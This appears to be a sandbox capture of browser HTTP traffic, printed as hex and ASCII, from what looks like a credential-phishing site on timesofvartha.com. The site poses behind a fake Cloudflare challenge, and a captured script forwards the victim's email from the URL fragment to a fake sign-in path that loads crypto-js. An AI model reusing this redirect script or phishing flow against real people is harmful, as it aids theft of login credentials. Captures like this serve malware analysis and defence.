                                                                                                                              2024-11-18 16:56:00 UTC1205INData Raw: 71 58 69 4d 77 5a 61 66 6c 72 47 57 79 4a 61 7a 6e 4d 50 49 6d 62 71 6e 78 38 61 4d 71 38 4f 76 6b 59 75 70 72 71 53 58 71 64 61 67 33 71 44 6b 72 4a 76 65 32 65 6a 6e 77 2b 6d 6f 74 65 66 4e 70 2b 2f 72 30 61 37 67 36 4d 6d 78 39 64 6e 71 2f 50 76 62 2f 62 79 7a 31 65 32 37 38 4e 6e 66 77 2f 59 4d 35 41 30 4d 37 77 37 4e 44 75 48 37 7a 68 48 68 41 52 6b 59 43 68 72 5a 43 67 67 49 32 2f 63 51 41 74 76 35 49 66 67 54 41 41 6f 67 34 77 54 36 2b 4f 6f 48 4a 41 7a 74 4d 67 49 6e 4f 54 67 79 4f 76 67 55 48 69 6a 38 50 68 4c 2b 2b 78 77 77 50 41 45 66 48 69 52 4e 54 45 70 4f 44 6a 30 4e 46 41 77 57 44 54 52 50 4f 45 68 45 4b 52 30 2b 4d 6b 30 62 52 46 56 44 58 44 78 6d 49 7a 6f 6a 4f 32 6c 75 54 44 78 77 4b 6d 74 50 54 6c 42 7a 54 7a 68 49 62 6a 78 72 54 58 35
                                                                                                                              Data Ascii: qXiMwZaflrGWyJaznMPImbqnx8aMq8OvkYuprqSXqdag3qDkrJve2ejnw+motefNp+/r0a7g6Mmx9dnq/Pvb/byz1e278Nnfw/YM5A0M7w7NDuH7zhHhARkYChrZCggI2/cQAtv5IfgTAAog4wT6+OoHJAztMgInOTgyOvgUHij8PhL++xwwPAEfHiRNTEpODj0NFAwWDTRPOEhEKR0+Mk0bRFVDXDxmIzojO2luTDxwKmtPTlBzTzhIbjxrTX5
                                                                                                                              2024-11-18 16:56:00 UTC1369INData Raw: 67 77 37 46 68 67 59 50 67 6b 67 54 55 45 70 4d 52 41 75 45 46 73 6c 48 52 55 6f 49 46 6c 42 59 69 77 33 50 57 49 78 4b 54 6c 55 4a 45 4a 45 5a 43 38 75 50 58 49 38 63 56 39 34 62 6b 46 4e 65 55 64 6f 54 54 74 33 56 6e 4a 31 4f 6f 42 37 51 30 53 46 58 48 35 47 59 32 46 34 68 33 39 68 66 30 35 72 64 59 52 6a 68 4a 71 50 5a 4a 56 78 66 35 64 32 65 59 31 67 6b 70 78 32 61 4b 57 54 69 58 57 44 67 5a 6c 72 65 5a 2b 7a 5a 72 43 66 64 34 43 50 63 36 6c 7a 62 33 32 4d 74 70 4f 72 72 33 32 77 67 4d 47 45 6d 37 4e 39 68 4d 75 32 72 34 6d 4f 72 59 57 66 71 38 43 6b 7a 4b 36 71 70 35 71 50 79 39 71 66 6f 61 44 51 6f 73 32 31 31 4e 7a 41 74 65 6d 6d 74 65 2b 73 36 63 6e 52 34 72 2f 64 73 4f 65 77 39 39 6e 62 76 4c 4f 39 79 37 72 39 30 66 33 36 41 39 57 2b 30 67 58 49
                                                                                                                              Data Ascii: gw7FhgYPgkgTUEpMRAuEFslHRUoIFlBYiw3PWIxKTlUJEJEZC8uPXI8cV94bkFNeUdoTTt3VnJ1OoB7Q0SFXH5GY2F4h39hf05rdYRjhJqPZJVxf5d2eY1gkpx2aKWTiXWDgZlreZ+zZrCfd4CPc6lzb32MtpOrr32wgMGEm7N9hMu2r4mOrYWfq8CkzK6qp5qPy9qfoaDQos211NzAtemmte+s6cnR4r/dsOew99nbvLO9y7r90f36A9W+0gXI
                                                                                                                              2024-11-18 16:56:00 UTC1369INData Raw: 4e 53 4d 6b 68 42 4e 7a 59 53 4a 7a 4d 34 55 45 30 38 51 56 51 75 52 45 45 64 5a 55 52 47 4e 6c 6c 45 53 6d 42 44 53 45 38 78 59 6b 46 56 4a 32 4e 66 52 44 68 59 53 6c 31 37 65 55 68 53 4f 31 57 42 5a 47 4a 6e 63 6d 5a 6f 59 33 35 72 58 56 39 35 62 47 35 6a 61 33 52 30 6c 58 42 55 57 5a 46 55 6c 31 4e 63 67 4a 43 56 67 33 57 56 66 48 4f 67 68 49 64 37 68 49 71 68 64 34 47 61 6e 6e 2b 6e 6b 57 32 78 6d 4a 6d 47 71 5a 53 63 69 6f 75 73 65 5a 47 58 71 35 37 44 66 73 57 61 78 62 36 2b 77 49 71 64 71 63 6d 6a 72 71 65 4f 30 4a 53 32 6f 4a 62 48 74 4a 65 76 79 35 6d 61 6c 2b 43 79 6e 65 50 41 32 74 2b 6d 75 61 6e 69 78 4b 6e 47 71 63 6a 6a 34 36 2f 4d 36 37 65 30 35 4d 58 62 75 2b 6e 55 33 2f 6e 5a 77 63 32 36 77 74 55 48 30 41 4c 30 31 73 51 47 32 63 37 48 2b
                                                                                                                              Data Ascii: NSMkhBNzYSJzM4UE08QVQuREEdZURGNllESmBDSE8xYkFVJ2NfRDhYSl17eUhSO1WBZGJncmZoY35rXV95bG5ja3R0lXBUWZFUl1NcgJCVg3WVfHOghId7hIqhd4Gann+nkW2xmJmGqZSciouseZGXq57DfsWaxb6+wIqdqcmjrqeO0JS2oJbHtJevy5mal+CynePA2t+muanixKnGqcjj46/M67e05MXbu+nU3/nZwc26wtUH0AL01sQG2c7H+
                                                                                                                              2024-11-18 16:56:00 UTC1369INData Raw: 5a 52 30 67 53 4a 52 52 61 56 69 46 58 48 43 51 6c 50 56 68 65 50 68 78 6c 4a 69 6f 39 55 43 4a 47 57 30 39 6f 54 47 38 75 4e 6b 39 4a 4e 44 4a 54 55 47 39 4a 56 6b 31 31 51 46 77 38 68 55 69 45 66 6f 61 43 65 57 47 45 55 46 47 48 55 34 70 53 64 49 6d 4f 6c 33 46 36 6b 47 57 58 58 56 35 7a 63 4a 4e 65 56 33 32 6d 58 35 57 4a 6e 71 4f 46 6c 35 42 6d 65 62 4f 62 66 34 61 7a 6b 58 61 51 6a 4b 79 46 75 6f 36 4f 64 71 79 41 67 48 32 77 6f 4d 4a 36 6f 62 53 5a 77 38 57 5a 68 5a 69 70 6e 61 33 49 6c 62 44 48 7a 70 61 30 7a 4e 4b 79 72 62 66 57 6e 73 72 58 32 39 32 38 31 64 37 55 78 4e 2f 6c 32 4d 54 70 35 75 79 38 35 4b 75 79 33 75 65 77 7a 73 6a 71 38 75 58 6d 37 72 6a 57 33 64 36 38 78 64 48 6c 2f 76 54 32 41 51 54 66 36 50 37 48 2b 66 41 49 43 77 37 31 38 4d
                                                                                                                              Data Ascii: ZR0gSJRRaViFXHCQlPVhePhxlJio9UCJGW09oTG8uNk9JNDJTUG9JVk11QFw8hUiEfoaCeWGEUFGHU4pSdImOl3F6kGWXXV5zcJNeV32mX5WJnqOFl5BmebObf4azkXaQjKyFuo6OdqyAgH2woMJ6obSZw8WZhZipna3IlbDHzpa0zNKyrbfWnsrX29281d7UxN/l2MTp5uy85Kuy3uewzsjq8uXm7rjW3d68xdHl/vT2AQTf6P7H+fAICw718M
                                                                                                                              2024-11-18 16:56:00 UTC720INData Raw: 4d 55 45 76 55 55 4a 45 5a 53 42 54 58 7a 4e 63 53 45 30 33 62 6b 4e 51 62 55 35 45 54 30 39 6d 57 55 4e 58 57 56 31 4c 4f 30 78 74 64 6b 4a 30 63 6a 39 78 65 6e 4a 2f 59 33 56 71 52 6e 6d 4c 66 45 74 4f 62 58 4e 30 59 32 39 70 64 33 65 44 66 46 64 72 66 34 43 56 6f 5a 32 54 6d 6e 65 51 6c 47 46 6d 6c 58 71 4b 6a 34 6d 68 69 34 71 6f 6b 48 2b 4d 67 4b 57 70 70 70 43 72 73 62 36 4f 6e 37 61 54 74 36 2b 34 66 72 69 6b 76 4d 57 37 71 61 75 35 67 63 48 42 73 39 4b 7a 79 62 4f 55 77 61 6a 46 78 4c 6e 4e 76 38 76 4b 76 74 44 58 78 64 71 36 34 72 6e 49 35 63 7a 4a 70 73 2f 76 32 73 76 65 77 4e 54 54 33 73 7a 6c 73 65 62 4a 33 4c 66 35 36 65 44 66 41 76 44 58 31 4e 66 44 39 77 44 6e 44 4f 7a 71 41 67 51 43 37 2b 50 39 38 76 4c 57 39 76 66 7a 38 39 62 36 36 39 62
                                                                                                                              Data Ascii: MUEvUUJEZSBTXzNcSE03bkNQbU5ET09mWUNXWV1LO0xtdkJ0cj9xenJ/Y3VqRnmLfEtObXN0Y29pd3eDfFdrf4CVoZ2TmneQlGFmlXqKj4mhi4qokH+MgKWpppCrsb6On7aTt6+4frikvMW7qau5gcHBs9KzybOUwajFxLnNv8vKvtDXxdq64rnI5czJps/v2svewNTT3szlsebJ3Lf56eDfAvDX1NfD9wDnDOzqAgQC7+P98vLW9vfz89b669b


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.1749742208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:00 UTC675OUTPOST /cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4 HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 916
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Content-Type: application/json
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/cloudflare-challenge/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:00 UTC916OUTData Raw: 7b 22 73 69 74 65 6b 65 79 22 3a 22 30 78 34 41 41 41 41 41 41 41 68 6b 66 4b 31 6e 7a 38 6a 6a 47 2d 77 45 22 2c 22 73 65 63 6f 6e 64 61 72 79 54 6f 6b 65 6e 22 3a 22 30 2e 31 56 75 71 48 59 36 70 47 50 58 51 32 6a 47 5f 67 78 75 6c 66 75 63 2d 52 51 6d 6e 39 78 34 52 6a 30 4d 54 6a 6b 61 4f 42 66 59 44 79 31 73 59 32 6e 45 6a 6e 7a 57 57 50 5a 39 2d 39 51 56 75 72 74 38 4e 64 77 73 48 42 63 30 65 45 55 56 52 57 58 63 2d 66 30 70 4d 75 52 72 78 46 33 4c 31 49 67 76 33 6f 73 2d 70 59 68 64 37 55 6a 53 76 54 4f 30 7a 45 43 6b 4b 39 6d 5f 47 35 2d 6f 65 42 55 30 52 33 4b 4c 6e 58 30 6b 30 55 6a 6e 4e 50 45 38 35 4a 4f 76 53 30 57 46 6c 30 67 5f 51 6c 6a 48 70 4c 73 77 72 35 47 42 57 77 4e 47 77 77 36 38 74 6e 70 63 62 74 51 4f 55 73 50 76 66 38 2d 59 45 69
                                                                                                                              Data Ascii: {"sitekey":"0x4AAAAAAAhkfK1nz8jjG-wE","secondaryToken":"0.1VuqHY6pGPXQ2jG_gxulfuc-RQmn9x4Rj0MTjkaOBfYDy1sY2nEjnzWWPZ9-9QVurt8NdwsHBc0eEUVRWXc-f0pMuRrxF3L1Igv3os-pYhd7UjSvTO0zECkK9m_G5-oeBU0R3KLnX0k0UjnNPE85JOvS0WFl0g_QljHpLswr5GBWwNGww68tnpcbtQOUsPvf8-YEi
                                                                                                                              2024-11-18 16:56:01 UTC261INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:00 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Tue, 15 Mar 2022 22:06:31 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 583
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              2024-11-18 16:56:01 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.1749743104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:00 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:01 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:00 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: KSYgPJKDba2NVR+cQCb4Li4Z+h92amjZTgc=$KTl6df4IUzZfuPs5
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497dcdb8c6e905-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:56:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.1749745208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:01 UTC878OUTPOST /cloudflare-challenge/ HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 859
                                                                                                                              Cache-Control: max-age=0
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://timesofvartha.com/cloudflare-challenge/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:01 UTC859OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 34 67 39 30 59 6b 6b 62 56 32 64 75 32 42 6a 49 52 6e 51 30 32 34 4e 35 4b 5a 6d 4d 77 75 4c 48 70 65 6d 44 76 2d 38 5a 57 4a 34 44 57 32 56 63 35 49 64 37 45 54 45 4f 72 54 45 6f 39 70 35 6d 50 73 79 4a 78 4d 4c 47 55 32 6a 56 64 72 41 69 32 30 6d 35 66 6b 65 53 59 47 74 6f 31 6c 5f 78 63 58 4f 46 75 54 30 50 6a 58 6c 6d 75 58 64 33 4e 4e 79 76 48 41 50 74 6f 59 50 64 4f 6d 58 5f 72 36 45 52 59 4c 6e 45 4f 71 64 5a 35 71 4a 42 48 65 64 77 6e 36 4e 66 35 4f 76 6b 52 4b 32 63 54 69 30 54 2d 6f 61 6e 48 30 76 64 2d 6e 75 41 53 61 63 61 74 78 4a 43 72 53 61 37 79 6e 34 64 34 52 74 6a 46 48 36 64 6d 33 38 45 47 71 46 4b 63 61 77 76 42 39 30 37 49 36 57 75 72 46 6d 48 52 66 6a 2d 55 7a 6b
                                                                                                                              Data Ascii: cf-turnstile-response=0.4g90YkkbV2du2BjIRnQ024N5KZmMwuLHpemDv-8ZWJ4DW2Vc5Id7ETEOrTEo9p5mPsyJxMLGU2jVdrAi20m5fkeSYGto1l_xcXOFuT0PjXlmuXd3NNyvHAPtoYPdOmX_r6ERYLnEOqdZ5qJBHedwn6Nf5OvkRK2cTi0T-oanH0vd-nuASacatxJCrSa7yn4d4RtjFH6dm38EGqFKcawvB907I6WurFmHRfj-Uzk
                                                                                                                              2024-11-18 16:56:03 UTC208INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:01 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:56:03 UTC243INData Raw: 65 38 0d 0a 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0a 20 20 20 20 66 72 61 67 6d 65 6e 74 20 3d 20 66 72 61 67 6d 65 6e 74 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 69 6d 65 73 6f 66 76 61 72 74 68 61 2e 63 6f 6d 2f 61 75 74 68 2d 73 69 67 6e 69 6e 2d 61 70 69 62 72 69 64 67 65 5f 34 38 31 37 33 36 75 79 67 37 79 37 33 68 64 75 69 32 31 2f 23 27 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: e8<script> var fragment = window.location.hash.substring(1); fragment = fragment.replace(/\+/g, '@'); window.location.href = 'https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#' + fragment; </script>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.1749744208.91.198.814436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:03 UTC747OUTGET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1
                                                                                                                              Host: timesofvartha.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Referer: https://timesofvartha.com/cloudflare-challenge/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:03 UTC255INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:03 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Thu, 14 Nov 2024 13:43:20 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 3546
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              2024-11-18 16:56:03 UTC3546INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 0a 23 6e 61 63 72 65 6f 75 73 20 7b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 62 6f 75 6e 63 65 20 35 73 20 69 6e 66 69 6e 69 74 65 3b 20 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 20 7b 35 39 25 20
                                                                                                                              Data Ascii: <html><head><meta name="viewport" content="width=device-width, initial-scale=1.0"><script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script><style>#nacreous { animation: bounce 5s infinite; }@keyframes bounce {59%


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.1749747104.17.24.144436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:04 UTC563OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:04 UTC962INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:04 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"5eb03e2d-bb78"
                                                                                                                              Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 549225
                                                                                                                              Expires: Sat, 08 Nov 2025 16:56:04 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYPxPwMmAMLM1Ljd%2FUirieaQhtgHuK7Rtt2O%2BGpQW0vkRPOy2BaacnKre5%2BiEK5loxT6adyLZ%2BJz80SlwFJeeOKeoNBP0Ju15gTKE6Zppw0wTajm6733Puk6tFY8IG%2Fj9IxFOEgK"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497de3d98f3ab0-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:56:04 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                                                              Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                                                              2024-11-18 16:56:04 UTC1369INData Raw: 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                                                              Data Ascii: &(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typ
